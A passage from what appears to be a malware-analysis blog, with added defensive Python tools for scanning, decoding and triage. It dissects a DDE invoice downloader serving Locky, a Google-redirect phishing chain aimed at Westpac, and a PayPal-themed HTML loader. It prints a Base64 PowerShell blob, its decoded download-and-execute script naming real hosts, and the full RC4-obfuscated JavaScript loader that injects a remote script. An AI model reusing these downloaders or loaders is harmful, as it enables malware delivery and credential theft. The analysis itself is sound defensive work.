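    (e.g. QUOTE wrapping DDE), so runs are joined until the outermost end."""
    root = ET.fromstring(part_xml)
    fields = []
    for para in root.iter(W + "p"):
        for simple in para.iter(W + "fldSimple"):
            fields.append(simple.get(W + "instr", ""))
        depth, buf = 0, []
        for el in para.iter():
            if el.tag == W + "fldChar":
                kind = el.get(W + "fldCharType")
                if kind == "begin":
                    depth += 1
                elif kind == "end" and depth > 0:
                    depth -= 1
                    if depth == 0:
                        fields.append("".join(buf))
                        buf = []
            elif el.tag == W + "instrText" and depth > 0:
                buf.append(el.text or "")
    return fields


def scan_docx_for_dde(container: bytes) -> list:
    """(part name, whitespace-normalised instruction) for every DDE/DDEAUTO field
    in the body, headers, footers, footnotes or any other WordprocessingML part."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(container)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for instr in field_instructions(zf.read(name)):
                    if DDE_RE.search(instr):
                        hits.append((name, " ".join(instr.split())))
    return hits


if __name__ == "__main__":
    for part, instr in scan_docx_for_dde(build_sample_docx(SAMPLE_DOCUMENT_XML)):
        print(f"{part}: {instr}")
```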
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>Email:</b></span></div>
<div class="p1">
<span class="s1">Subject: Emailed Invoice - *</span></div>
<div class="p1">
<span class="s1">Attachment: l_123456.doc-</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>Downloader:</b></span></div>
<div class="p1">
<span class="s1">FileName: I_099292.doc</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">MD5: 0910541c2ac975a49a28d7a939e48cd3</span></div>
<div class="p1">
<span class="s1">SHA1: 0f3448bd32ddf76f6b23c8f1937e71770bb0663a</span></div>
<div class="p1">
<span class="s1">SHA256: 3fa85101873d1c3447594c309ea1e324beb578843e1fab7c05189830d2def126</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>DDE Flow:</b></span></div>
<div class="p1">
<br /></div>
<div class="p1">
1. Open the doc</div>
<div class="p2" style="text-align: left;">
<span class="s1"></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-bY3E9tJnJgv_aCCjB526tfguqV6XZt8ogDcboQEBRMxkRv19xxTxaI1JSze39l7OVYp_7rYBwAb-3pUX42O0RBIME7fQcdFrk9pHodwW6R-ME0AEuEWMrK8TZUR6vZ3_lpLJpP-9J9J/s1600/1.PNG" imageanchor="1" style="font-family: Times; font-size: medium; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="129" data-original-width="463" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-bY3E9tJnJgv_aCCjB526tfguqV6XZt8ogDcboQEBRMxkRv19xxTxaI1JSze39l7OVYp_7rYBwAb-3pUX42O0RBIME7fQcdFrk9pHodwW6R-ME0AEuEWMrK8TZUR6vZ3_lpLJpP-9J9J/s320/1.PNG" width="320" /></a></div>
<div class="p2" style="text-align: left;">
<span style="font-size: 11px;">2. This message pops up (Word asking whether to update the document's fields; answering Yes is what lets the DDE field run):</span></div>
<div class="p2">
<span class="s1"></span><br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrpCVJ0yR1cd4bXWoCUwbX5nDPF0-5lG0fxWBCt40Y2wRxWW2gveXDZ_eJUs2JD8V0pPinqrnsYN6P5LPeFFVBLD9QlfNsFOtYsqGa9fc5Q0iE_jV9A6ciJMFv6TFEL29dw4I00BACToG/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="297" data-original-width="1183" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrpCVJ0yR1cd4bXWoCUwbX5nDPF0-5lG0fxWBCt40Y2wRxWW2gveXDZ_eJUs2JD8V0pPinqrnsYN6P5LPeFFVBLD9QlfNsFOtYsqGa9fc5Q0iE_jV9A6ciJMFv6TFEL29dw4I00BACToG/s320/2.PNG" width="320" /></a></div>
<div class="p1">
<br /></div>
<div class="p1">
3. Nothing on the first page:</div>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO68YYsYtFD-dMQ5eFPqaVtQrd5QbGq1wUfsl7lLoW6_HbIfVwJmsj-gTYePEYL4xtx0tccP-n-qqDBYjobpHH_eIWKqKvzgkybfH1IoGoKXl49g4K1glatR95Hqnh4v4A0Q__g-n7MAeN/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="747" data-original-width="1600" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO68YYsYtFD-dMQ5eFPqaVtQrd5QbGq1wUfsl7lLoW6_HbIfVwJmsj-gTYePEYL4xtx0tccP-n-qqDBYjobpHH_eIWKqKvzgkybfH1IoGoKXl49g4K1glatR95Hqnh4v4A0Q__g-n7MAeN/s320/5.PNG" width="320" /></a></div>
<div class="p2">
<br /></div>
<div class="p1">
<span class="s1"> 4. </span>Scroll to the end:</div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNDHXSY0jWMNg9R4Rgu_ZPkW_KcKwuqeYTrAsHQbJ5Z3lT7FP0yGL8kcay02bxknkta_nKZlXiyH4k1jXfFfUDpX7jEJ9Qoc7U2wQfz8s1YDd-6CPxTer2yw1b2qFhi17xIEBFObMS-hRR/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="661" data-original-width="1133" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNDHXSY0jWMNg9R4Rgu_ZPkW_KcKwuqeYTrAsHQbJ5Z3lT7FP0yGL8kcay02bxknkta_nKZlXiyH4k1jXfFfUDpX7jEJ9Qoc7U2wQfz8s1YDd-6CPxTer2yw1b2qFhi17xIEBFObMS-hRR/s320/6.PNG" width="320" /></a></div>
<div class="p2">
<br /></div>
<div class="p1">
5. This is the DDE code:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<ol class="ol1"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiecFIaaCpbYCapE9m-4Mn3aBBlP1hC7BXyIwgRp6iD2KFTszqOAXXq69bMPnDpmY-I2Q1nNEq3qlcCDdFaIk-sLeV1bdRpSzpsF-WuYZ0ycyhs3tAiYtYxsaNdqPIlAA9-xHX-U7824uAp/s1600/7.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" data-original-height="311" data-original-width="681" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiecFIaaCpbYCapE9m-4Mn3aBBlP1hC7BXyIwgRp6iD2KFTszqOAXXq69bMPnDpmY-I2Q1nNEq3qlcCDdFaIk-sLeV1bdRpSzpsF-WuYZ0ycyhs3tAiYtYxsaNdqPIlAA9-xHX-U7824uAp/s320/7.PNG" width="320" /></a></ol>
<span style="font-family: "helvetica"; font-size: 11px;">6. Toggle the field code (Alt+F9):</span><br />
<ol class="ol1">
</ol>
<div class="p2">
<span class="s1"></span><br /></div>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCBaUBQq45WsMQd-951N4tK34BpvW5v_QVdWOkceXZafubuukiqYL6qhrXZXarILvMrXvllNSWW2mkVmH96ACg4BuNMZikBqLJ2L03RMtiFRsI0faTpOC1CPvZ0PChP-OCiiB1ntQ5hyphenhyphenLs/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="692" data-original-width="1600" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCBaUBQq45WsMQd-951N4tK34BpvW5v_QVdWOkceXZafubuukiqYL6qhrXZXarILvMrXvllNSWW2mkVmH96ACg4BuNMZikBqLJ2L03RMtiFRsI0faTpOC1CPvZ0PChP-OCiiB1ntQ5hyphenhyphenLs/s320/8.png" width="320" /></a></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<span style="font-family: "helvetica"; font-size: 11px;">7. This should give you the actual code:</span><br />
<ol class="ol1">
</ol>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7aKVrmwoYfaLVJMCuyselbTYx3hig5yFpT5M3Z8WTjccBIzQAk_0AFkUCZapmG0K_CjLlWwJ_bGMOtIcZCNVEunVoEuxriiRHvJTHJgDmbX6Uz8A8nKaC-3yZd4LDFOajdcW2GLYrAK61/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="451" data-original-width="1573" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7aKVrmwoYfaLVJMCuyselbTYx3hig5yFpT5M3Z8WTjccBIzQAk_0AFkUCZapmG0K_CjLlWwJ_bGMOtIcZCNVEunVoEuxriiRHvJTHJgDmbX6Uz8A8nKaC-3yZd4LDFOajdcW2GLYrAK61/s320/9.PNG" width="320" /></a></div>
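Steps 1 to 7 above find the field by hand in Word. For triage at scale you want the same check without opening the document, so here is an added example (my code, not the post's) that scans an OOXML .docx for DDE/DDEAUTO field codes and joins instruction text that has been split across several w:instrText runs, a common way of hiding the keyword. The sample on this page is a legacy binary .doc, which this parser does not read; for that format use oletools' msodde, which handles both. The embedded document is constructed for the test and is not the analysed file.

```python
"""Scan a .docx for DDE/DDEAUTO field codes without opening it in Word."""
from __future__ import annotations

import io
import re
import xml.etree.ElementTree as ET
import zipfile

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def field_codes(part_xml: bytes) -> list[str]:
    """Return every field instruction in one document part.

    Complex fields are w:fldChar begin ... w:instrText* ... separate ... end; the
    instruction may be split over many w:instrText runs (and nested inside another
    field such as QUOTE), so text is accumulated until the outermost field ends.
    """
    codes, current, depth = [], [], 0
    for el in ET.fromstring(part_xml).iter():          # document order
        if el.tag == W + "fldSimple":
            codes.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    codes.append("".join(current))
                    current = []
        elif el.tag == W + "instrText" and depth > 0:
            current.append(el.text or "")
    return codes


def find_dde(docx_bytes: bytes) -> list[str]:
    """Whitespace-normalised DDE field codes from every word/*.xml part (body, headers, footers)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for code in field_codes(z.read(name)):
                    norm = " ".join(code.split())
                    if DDE_RE.search(norm):
                        hits.append(norm)
    return hits


def build_sample_docx(dde: bool = True) -> bytes:
    """Constructed minimal .docx for the test (not the sample from the post).

    The DDE field is split across two runs and its command is harmless."""
    dde_para = (
        '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">AUTO c:\\Windows\\System32\\cmd.exe '
        '"/k echo dde-test"</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Invoice</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    ) if dde else ""
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body>'
        '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; ">'
        '<w:r><w:t>11 October 2017</w:t></w:r></w:fldSimple></w:p>'
        f"{dde_para}</w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    for code in find_dde(build_sample_docx()):
        print("DDE field:", code)
```

Run it against a real file with `find_dde(open("sample.docx", "rb").read())`; an empty list means no DDE field was found in the document body, headers or footers, not that the file is clean of everything else (macros, embedded OLE objects).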
<div class="p2">
<span class="s1"></span><br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">This downloader was found to be serving Locky.</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">The DDE command above reaches out to arkberg-design*fi and fetches the string below. It is Base64 over UTF-16LE text (the encoding PowerShell's -EncodedCommand takes), which is why the decoded listing further down has to be read as UTF-16 rather than UTF-8:</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">*<b>DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AcwBoAGEAbQBhAG4AaQBjAC0AZQB4AHQAcgBhAGMAdABzAC4AYgBpAHoALwBlAHUAcgBnAGYAOAAzADcAbwByACIALAAiAGgAdAB0AHAAOgAvAC8AYwBlAG4AdAByAGEAbABiAGEAcAB0AGkAcwB0AGMAaAB1AHIAYwBoAG4AagAuAG8AcgBnAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiACwAIgAiACwAIgBoAHQAdABwADoALwAvAGMAbwBuAHgAaQBiAGkAdAAuAGMAbwBtAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQA*cgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIA*AkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAHIAZQBrAGEAawB2AGEAMwAyAC4AZQB4AGUAIgAJAA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAGYAcAANAAoACQAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA0ACgAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAGYAcAApAA0ACgAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYAcAANAAoACQBiAHIAZQBhAGsADQAKAH0ADQAKAEMAYQB0AGMAaAANAAoAewANAAoAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoADQAKAAkADQAKAH0ADQAKAA==</b>*</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">Decoded:</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<pre>
$urls = "hxxp://<b>shamanic-extracts.biz</b>/ eurgf837or","hxxp://<b>centralbaptistchurchnj.org</b>/ eurgf837or","","hxxp://<b>conxibit.com</b>/ eurgf837or"
foreach($url in $urls){
Try
{
	Write-Host $url
	$fp = "$env:temp\rekakva32.exe"
	Write-Host $fp
	$wc = New-Object System.Net.WebClient
	$wc.DownloadFile($url, $fp)
	Start-Process $fp
	break
}
Catch
{
   Write-Host $_.Exception.Message
}

}
</pre>
The empty entry in $urls is in the original blob: on that iteration DownloadFile throws, the Catch prints the message and the loop continues. The break is only reached after a successful download and Start-Process, so the first live host wins and the file always lands at %TEMP%\rekakva32.exe.</div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
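The blob above is UTF-16LE under the Base64; decoding it as UTF-8 gives text with a NUL after every character, and a regex for http:// silently matches nothing. Below is an added example (my code, not the post's) that picks the encoding from the bytes, drops defanging characters, and pulls out the URLs, the drop path and the download/execute primitives; the same extractor works on the decoded listing above. The embedded script is constructed to match the shape of the real one, with made-up hosts under example.test rather than the campaign's domains.

```python
"""Decode the Base64 string a DDE stage pulls down and extract the IOCs from the PowerShell."""
import base64
import re

URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s\"',)]+", re.IGNORECASE)
DROP_RE = re.compile(r"\$env:temp\\[^\s\"]+", re.IGNORECASE)
API_RE = re.compile(r"\b(DownloadFile|DownloadString|Start-Process|Invoke-Expression|IEX|Net\.WebClient)\b",
                    re.IGNORECASE)


def decode_ps_blob(blob: str) -> str:
    """Base64-decode a PowerShell payload and choose the text encoding from the bytes.

    Characters outside the Base64 alphabet (whitespace, defanging marks such as '*')
    are discarded by b64decode. PowerShell -EncodedCommand, like the blob on this page,
    carries UTF-16LE: ASCII text shows up as one byte followed by NUL, so if the odd
    bytes are (almost) all zero we decode as UTF-16LE, otherwise as UTF-8.
    """
    raw = base64.b64decode("".join(blob.split()))
    odd = raw[1::2]
    if raw and odd.count(0) >= 0.9 * len(odd):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_iocs(script: str) -> dict:
    """URLs, dropped file paths and the download/execute primitives used, in order of appearance."""
    return {
        "urls": URL_RE.findall(script),
        "drop_paths": DROP_RE.findall(script),
        "apis": sorted({m.group(0) for m in API_RE.finditer(script)}),
    }


# Constructed stand-in for the fetched script: same shape as the decoded one above,
# with made-up hosts (example.test). This is not the real blob from the campaign.
SAMPLE_SCRIPT = r'''$urls = "http://dl-one.example.test/eurgf837or","http://dl-two.example.test/eurgf837or","","http://dl-three.example.test/eurgf837or"
foreach($url in $urls){
Try
{
	$fp = "$env:temp\rekakva32.exe"
	$wc = New-Object System.Net.WebClient
	$wc.DownloadFile($url, $fp)
	Start-Process $fp
	break
}
Catch
{
	Write-Host $_.Exception.Message
}
}
'''
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_UTF8_BLOB = base64.b64encode(b"Write-Host hi").decode("ascii")

if __name__ == "__main__":
    script = decode_ps_blob(SAMPLE_BLOB)
    for key, values in extract_iocs(script).items():
        print(key, values)
```

Paste the blob from the page straight into decode_ps_blob: the stray asterisks are dropped before decoding, and a UTF-8 blob from a different campaign goes through the same function unchanged.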
<div class="separator" style="clear: both; text-align: center;">
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica}
p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px}
li.li1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica}
span.s1 {font-kerning: none}
ol.ol1 {list-style-type: decimal}
</style>
</div>
<div class="p1">
<span class="s1">The payload is Locky.</span></div>
<div class="separator" style="clear: both; text-align: left;">
:)</div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-65255836267940156872017-09-27T17:09:00.001-07:002017-09-27T17:09:16.893-07:00Phishing - google redirect function used in link for phising WestPac bank<div dir="ltr" style="text-align: left;" trbidi="on">
https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w<br />
<br />
Which should lead to: http://www.almatulum.com/blog/new-lounge-area/<br />
<br />
Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483<br />
<br />
This is the fake Westpac page.<br />
Just another phishing email with a twist: the visible link is on google.com.au, which looks safe to the recipient and to reputation filters, and Google's /url redirector hands the victim to the compromised site, which then bounces to the credential-harvesting page. The real first destination is sitting in the url= parameter of the link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ92VgD6tP8Tn4cBszWMAay7hshyphenhyphenZxhZhe0emPCSrp7vpX-im4bDQ8emqUAYEGdkeQk2tXqPp9iSkxCBj_mrRs3W3inAWk3vnEr0Cbl2Mit6hdrVvUXn8g3LEgZU5BEDSEhgcny8dqE3tT/s1600/westpac_phish.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="948" data-original-width="1600" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ92VgD6tP8Tn4cBszWMAay7hshyphenhyphenZxhZhe0emPCSrp7vpX-im4bDQ8emqUAYEGdkeQk2tXqPp9iSkxCBj_mrRs3W3inAWk3vnEr0Cbl2Mit6hdrVvUXn8g3LEgZU5BEDSEhgcny8dqE3tT/s640/westpac_phish.png" width="640" /></a></div>
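To triage a link like this without visiting it, strip the redirector and look at the host it actually hands the victim to. Added example (my code, not from the post): it resolves the Google /url hop offline from the link above; the second hop (almatulum.com to hustlecreative.com) is a server-side redirect that only a live fetch would reveal, so the chain stops there.

```python
"""Unwrap a search-engine redirector link to the host it actually sends the victim to."""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Google's /url redirector on any country TLD (www.google.com, www.google.com.au, ...).
GOOGLE_HOST = re.compile(r"^(www\.)?google\.[a-z]{2,3}(\.[a-z]{2})?$", re.IGNORECASE)


def redirect_target(url: str) -> str | None:
    """Destination carried inside a Google /url link, or None if this is not one."""
    parts = urlsplit(url)
    if not (GOOGLE_HOST.match(parts.netloc) and parts.path == "/url"):
        return None
    query = parse_qs(parts.query)          # percent-decodes the value for us
    for name in ("url", "q"):              # the redirector accepts either parameter name
        if query.get(name):
            return query[name][0]
    return None


def unwrap(url: str, max_hops: int = 5) -> list[str]:
    """Follow redirector parameters offline; the chain starts with the link as displayed."""
    chain = [url]
    while len(chain) <= max_hops:
        nxt = redirect_target(chain[-1])
        if nxt is None:
            break
        chain.append(nxt)
    return chain


def triage(url: str) -> dict:
    """What the recipient sees versus where the link really points."""
    chain = unwrap(url)
    return {
        "displayed_host": urlsplit(chain[0]).netloc,
        "lands_on": urlsplit(chain[-1]).netloc,
        "hops": len(chain) - 1,
        "redirector_abuse": len(chain) > 1,
    }


# The link from the phishing email above, copied from the post.
PHISH_LINK = ("https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8"
              "&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA"
              "&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F"
              "&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w")

if __name__ == "__main__":
    print(unwrap(PHISH_LINK))
    print(triage(PHISH_LINK))
```

In a mail gateway rule the useful signal is `lands_on` differing from `displayed_host`: the link text says Google, the destination is a random WordPress blog.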
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-70508499591110651302017-09-26T17:22:00.002-07:002017-09-26T17:22:46.997-07:00Phishing - JavaScript loader in HTML page - PayPal theme<div dir="ltr" style="text-align: left;" trbidi="on">
This one is sent as an HTML attachment, so the first stage runs locally in the victim's browser instead of being fetched over the network, which keeps it away from network-based detection. The attachment is only a loader: it RC4-decrypts a URL (key j388p) from a hex string and injects a script element pointing at it into the page head. The page that eventually loads is the fake PayPal site; whatever the victim enters is sent to the C2 server, and a final redirect to the real PayPal site keeps the user from suspecting anything.<br />
<br />
<pre>
&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;/head&gt;

&lt;body&gt;&lt;script&gt;

// Hex decoder: two hex digits per character, optional 0x prefix.
function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f; apnsxieh&lt;rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}

// Textbook RC4: the first loop fills the 256-entry S-box, the second is the key schedule,
// the third generates the keystream and XORs it over the input (ll1u8137 = data, rx3oj311 = key).
function f8ce53222(ll1u8137, rx3oj311) {
 var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
 for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 &lt; 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
 for (in3431y23 = 0; in3431y23 &lt; 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
 for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 &lt; ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
 return jxl077g53
}

// Every string the loader needs is RC4-encrypted with the key "j388p" and stored as hex.
var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
// p918 decodes to "http://www.<b>subject-data.com</b>/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into the browser

var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");
// zgdz decodes to "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
// jkl6lg decodes to "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
// This results in head &gt; script &gt; JS: a script element pointing at subject-data.com is injected into the page head.

&lt;/script&gt;

&lt;/body&gt;
&lt;/html&gt;
</pre></div>
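The two helper functions are the whole obfuscation scheme: c7tn83 is a hex decoder and f8ce53222 is unmodified RC4 keyed with the string j388p. Added example (my code, not the loader's) that reimplements both in Python so the strings can be recovered without executing the attachment. The hex blobs and key are copied from the listing above; the RC4 routine is checked against the standard public test vectors rather than against the loader's own output.

```python
"""RC4 plus hex decoding, as used by the HTML loader above, reimplemented in Python."""


def rc4(data: bytes, key: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation, XOR with input
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hex_to_bytes(text: str) -> bytes:
    """Same job as the loader's c7tn83(): optional 0x prefix, two hex digits per byte."""
    if text.startswith("0x"):
        text = text[2:]
    return bytes.fromhex(text)


def decode_loader_string(hex_blob: str, key: str = "j388p") -> str:
    """f8ce53222(c7tn83(hex_blob), key). The JS keeps one byte per character, so latin-1 maps 1:1."""
    return rc4(hex_to_bytes(hex_blob), key.encode("latin-1")).decode("latin-1")


# Key and hex strings copied from the loader above.
LOADER_KEY = "j388p"
LOADER_BLOBS = {
    "p918": "bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2",
    "zgdz": "a477edb69a82",
    "jkl6lg": "bf71febb",
}


def decode_all(blobs: dict = LOADER_BLOBS, key: str = LOADER_KEY) -> dict:
    """Every obfuscated string in the loader, decrypted."""
    return {name: decode_loader_string(blob, key) for name, blob in blobs.items()}


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(name, "=", value)
```

The same two functions cover most loaders of this family: find the key string passed as the second argument, feed each hex literal through decode_loader_string, and the URL and DOM method names fall out without touching a browser.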
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-55303264607894780782017-09-25T21:37:00.000-07:002017-09-25T21:39:03.936-07:00Here's a simple, straight-forward downloader that can serve any payload<div dir="ltr" style="text-align: left;" trbidi="on">
<u>Written in plain VBS, launched by WScript on a Windows host.</u><br />
<br />
<u>Currently serving Locky ransomware.</u><br />
<br />
